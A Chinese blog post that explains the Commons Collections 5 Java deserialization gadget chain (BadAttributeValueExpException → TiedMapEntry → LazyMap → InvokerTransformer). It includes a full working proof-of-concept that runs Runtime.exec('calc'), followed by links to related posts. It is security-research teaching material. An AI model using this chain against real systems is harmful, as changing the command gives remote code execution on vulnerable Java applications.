Java安全—CommonsCollections5

最新推荐文章于 2024-06-26 07:00:00 发布
最新推荐文章于 2024-06-26 07:00:00 发布
阅读量591 收藏
点赞数
分类专栏: java 文章标签: java 开发语言 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52988816/article/details/126396141
版权

引子

在jdk1.8的时候Annotationinvocation的readObject方法被改写,cc1链就不适用了,cc5链是基于Lazymap类在jdk1.8使用TiedMapEntry+BadAttributeValueExpException来触发LazyMap的get方法。

TiedMapEntry类

toString方法中有个getValue()

public String toString() {
    return getKey() + "=" + getValue();
}

而在getValue()中会发现又调用了get()

 public V getValue() {
        return this.map.get(this.key);
    }

可以发现返回的是map.get()方法,联想到CC1 lazymap链的后面部分,也是需要调用lazymap的get方法,我们只需要利用构造方法把map赋给lazymap.

   public TiedMapEntry(Map<K, V> map, K key) {
        this.map = map;
        this.key = key;
    }

构造攻击链

然后我们寻找如何触发toString方法,BadAttributeValueExpException类中的readObject()中 调用了该方法。

    private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
        ObjectInputStream.GetField gf = ois.readFields();
        Object valObj = gf.get("val", null);

        if (valObj == null) {
            val = null;
        } else if (valObj instanceof String) {
            val= valObj;
        } else if (System.getSecurityManager() == null
                || valObj instanceof Long
                || valObj instanceof Integer
                || valObj instanceof Float
                || valObj instanceof Double
                || valObj instanceof Byte
                || valObj instanceof Short
                || valObj instanceof Boolean) {
            val = valObj.toString();
        } else { // the serialized object is from a version without JDK-8019292 fix
            val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
        }
    }

可以看到关键

 val = valObj.toString();

我们只需要要让valObj为TiedMapEntry类,现在看看要如何做,先找给valObj赋值的地方。

ObjectInputStream.GetField gf = ois.readFields();
        Object valObj = gf.get("val", null);

调用readFields从流中读取了所有的持久化字段,然后调用get()方法得到了名字是val的字段。

    private Object val;

现在我们只需要修改val的值就可以了。

  BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        //Reflection
        Class clazz = Class.forName("javax.management.BadAttributeValueExpException");
        Field field = clazz.getDeclaredField("val");
        field.setAccessible(true);
        field.set(badAttributeValueExpException,tiedMapEntry);

POC

整个的POC

package com.summer.cc5;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CommonsCollections5 {
    public static void main(String[] args) throws Exception{
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Class.forName("java.lang.Runtime")),
                new InvokerTransformer(
                        "getMethod",
                        new Class[]{String.class,Class[].class},
                        new Object[]{"getRuntime",new Class[0]}
                ),
                new InvokerTransformer(
                        "invoke",
                        new Class[]{Object.class,Object[].class},
                        new Object[]{null,new Object[0]}
                ),
                new InvokerTransformer(
                        "exec",
                        new Class[]{String.class},
                        new Object[]{"calc"}
                )
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, chainedTransformer);



        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap,"XINO");

        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);

        //Reflection
        Class clazz = Class.forName("javax.management.BadAttributeValueExpException");
        Field field = clazz.getDeclaredField("val");
        field.setAccessible(true);
        field.set(badAttributeValueExpException,tiedMapEntry);

        byte[] bytes = serialize(badAttributeValueExpException);
        //System.out.println(System.getSecurityManager());
        unserialize(bytes);
    }
    public static void unserialize(byte[] bytes) throws Exception{
        try(ByteArrayInputStream bain = new ByteArrayInputStream(bytes);
            ObjectInputStream oin = new ObjectInputStream(bain)){
            oin.readObject();
        }
    }

    public static byte[] serialize(Object o) throws Exception{
        try(ByteArrayOutputStream baout = new ByteArrayOutputStream();
            ObjectOutputStream oout = new ObjectOutputStream(baout)){
            oout.writeObject(o);
            return baout.toByteArray();
        }
    }
}

注意

这里需要注意的一点是

BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);

防止还没反序列化就进行攻击链了。

结语

今天给大家带来的是CC5链的构造分析,也是基本按照CC1走下来的,只是后面的部分不太一样。希望大家有所收获。

XINO丶
关注
专栏目录
Java反序列化(七)Common Collection 5分析
Vicl1fe的博客
06-04 332
前言 环境 jdk1.7 Commons Collections 3.1 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency> 利用链 Objec
【无标题】Java安全CommonsCollections4
AS011x的博客
08-17 222
这次给大家带来的是CC4链的简单分析,可以看到CC4链还是没有脱离之前跟的链的影子,我们可以看到CC3的前半部分以及CC2的后半部分,需要注意的问题的话就是版本问题了吧还有上面提到的一些小细节,至此CC链就快跟完了。...
CommonsCollections5分析
笑花大王
01-02 399
CommonsCollections5 调用链 BadAttributeValueExpException.readObject() | TiedMapEntry.toString() | LazyMap.get() | ChainedTransformer.transform() | ConstantTransformer.transform() | ...
Commons-Collections篇-CC5链分析
最新发布
鸣蜩十四的博客
06-26 617
CC5链和CC1差不多,只不过调用LazyMap.get()是通过TiedMapEntry.toString()触发的
java--CommonsCollections5学习
zyer
05-30 262
cc5和cc6差不多,主要都是利用TideMapEntry从而利用LazyMap调用get方法,而LazyMap的get方法需要的参数是LazyMap中没有的值才会触发LazyMap的transform的put方法。 TiedMapEntry 主要使用的是LazyMap的get方法,那么在这里我们可以看到其中getValue,hashCode,equals,toString都可以触发 那么下面我们需要寻找一个可以输入TideMapEntry这个类,并且可以触发这些函数之一的一个类。 BadAtt
[JAVA反序列化初学3]Commons-Collections5利用链分析
GX233的博客
03-24 5161
[JAVA反序列化]Commons-Collections5利用链分析
[Java反序列化]—CommonsCollections5
Sentiment的博客
06-04 601
CC5其实就是CC1的一种变形,CC1是通过获取,而CC5则是通过,其余部分都是一样的可以前后对比下CC1: CC5: 分析 先看下中如何调用的本类中有个方法调用了 而中调用了 再通过构造器将赋为即可回到CC1的后半部分 所以接下来看谁调用了,在类中的中发现调用 调用的是,所以现在要做的就是如何将构造成,看下从哪来的 先调用从流中读取了所有的持久化字段,然后调用方法得到了名字是的字段。所以可以通过修改的值,来修改,而是本类中的一个私有属性,直接反射......
p牛java安全漫谈学习笔记(3)_CommonsCollections1(cc1)分析
qq_35976649的博客
04-06 4336
cc1链(jdk6) 简化cc1-仿 使用p牛的简化cc1进行分析: package ysoserial.payloads; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import
commonscollections_map1rq_java_
10-02
标题中的"commonscollections_map1rq_java_"暗示了我们讨论的主题是关于Java编程语言中一个特定的安全问题,即Apache Commons Collections库的一个已知反序列化漏洞。Apache Commons CollectionsJava开发人员常用...
java安全 反序列化(二)
sechelper的博客
12-07 610
java反射,CC6链源码分析,LazyMap利用连,ysoserial工具
JAVA Apache-CommonsCollections 序列化RCE漏洞分析
u011066706的专栏
04-17 5680
0x00 漏洞背景 2015年11月6日,FoxGlove Security安全团队的@breenmachine 发布的一篇博客中介绍了如何利用Java反序列化漏洞,来攻击最新版的WebLogic、WebSphere、JBoss、Jenkins、OpenNMS这些大名鼎鼎的Java应用,实现远程代码执行。Apache Commons Collections这样的基础库非常多的Java应用都在用,
commons-collections
04-23
collections jar 包集合,使用Maven的可以直接使用!collections
Java安全Commons Collections5
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
12-07 622
【代码】Java安全Commons Collections5。
Java代码审计——Commons Collections5 BadAttributeValueExpException
王嘟嘟的博客
12-02 1225
0x00 前言 反序列化总纲 cc链无非就是不同的调用拼接在一起形成的,比如cc5就是在cc1的基础上进行调用调整的。 0x01 BadAttributeValueExpException 在LazyMap的基础上,发现了一个新的调用方式,就是通过 TiedMapEntry+BadAttributeValueExpException的方式进行调用的。 在之前,我们知道LazyMap需要调用get方法才可以触发,那么我们的主题就是如果去触发LazyMap的get方法。 1.TiedMapEntry 首先来看这
CommonCollections5链分析
Demodd的博客
03-20 4686
前言 ​ 本文直接跟着前面文章写了,没有描述前部分poc的内容 正文 看一下cc5的Gadget Gadget chain: ObjectInputStream.readObject() BadAttributeValueExpException.readObject() TiedMapEntry.toString() LazyMap.get() Chaine
[Java反序列化]CommonsCollections5利用链学习
feng的博客
08-16 851
前言 奇奇怪怪的就把CC5给看了。在看一个师傅的CC1的文章的时候,发现他写的LazyMap链不太一样,我以为是CC1的新链,然后也学习了一波,然后查了一下发现是CC5。。。 环境 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId>
java反序列化 exp_java反序列化Commons-Collections5分析
weixin_42522400的博客
02-25 121
BadAttributeValueExceptionpackage org.lain.poc;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections...
odbc 函数序列错误_Java反序列化利用链分析之CommonsCollections5,6,7,9,10
weixin_39600331的博客
11-29 299
0x00 前言本文继续分析CommonsCollections:3.1的相关反序列化利用链,这次主要分析CommonsCollections5,6,7,9,以及我找的一个新利用链,这里暂且将其称为10.0x01 环境准备CommonsCollections5,6,7,10用的还是commons-collections:3.1,jdk用7或8都可以。CommonsCollections...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值